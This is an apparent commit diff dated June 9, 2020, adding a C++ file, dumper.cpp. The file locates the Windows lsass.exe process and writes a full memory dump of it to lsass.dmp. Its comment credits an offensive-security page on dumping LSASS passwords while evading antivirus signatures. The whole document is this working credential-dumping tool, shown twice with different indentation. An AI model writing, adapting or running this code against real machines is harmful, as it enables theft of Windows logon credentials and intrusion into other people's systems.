HopHouse · June 9, 2020 19:42
diff --git a/dumper.cpp b/dumper.cpp
 /*
 * Took from https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
 */
 #include "stdafx.h"
 #include <windows.h>
 #include <DbgHelp.h>
 #include <iostream>
 #include <TlHelp32.h>
 using namespace std;

 int main() {
 	DWORD lsassPID = 0;
 	HANDLE lsassHandle = NULL; 
 	HANDLE outFile = CreateFile(L"lsass.dmp", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
 	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 	PROCESSENTRY32 processEntry = {};
 	processEntry.dwSize = sizeof(PROCESSENTRY32);
 	LPCWSTR processName = L"";

 	if (Process32First(snapshot, &processEntry)) {
 		while (_wcsicmp(processName, L"lsass.exe") != 0) {
 			Process32Next(snapshot, &processEntry);
 			processName = processEntry.szExeFile;
 			lsassPID = processEntry.th32ProcessID;
 		}
 		wcout << "[+] Got lsass.exe PID: " << lsassPID << endl;
 	}
 	
 	lsassHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, lsassPID);
 	BOOL isDumped = MiniDumpWriteDump(lsassHandle, lsassPID, outFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
 	
 	if (isDumped) {
 		cout << "[+] lsass dumped successfully!" << endl;
 	}
 	
    return 0;
 }
	/*
	* Took from https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
	*/
	#include "stdafx.h"
	#include <windows.h>
	#include <DbgHelp.h>
	#include <iostream>
	#include <TlHelp32.h>
	using namespace std;

	int main() {
	DWORD lsassPID = 0;
	HANDLE lsassHandle = NULL;
	HANDLE outFile = CreateFile(L"lsass.dmp", GENERIC_ALL, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	PROCESSENTRY32 processEntry = {};
	processEntry.dwSize = sizeof(PROCESSENTRY32);
	LPCWSTR processName = L"";

	if (Process32First(snapshot, &processEntry)) {
	while (_wcsicmp(processName, L"lsass.exe") != 0) {
	Process32Next(snapshot, &processEntry);
	processName = processEntry.szExeFile;
	lsassPID = processEntry.th32ProcessID;
	}
	wcout << "[+] Got lsass.exe PID: " << lsassPID << endl;
	}

	lsassHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, lsassPID);
	BOOL isDumped = MiniDumpWriteDump(lsassHandle, lsassPID, outFile, MiniDumpWithFullMemory, NULL, NULL, NULL);

	if (isDumped) {
	cout << "[+] lsass dumped successfully!" << endl;
	}

	return 0;
	}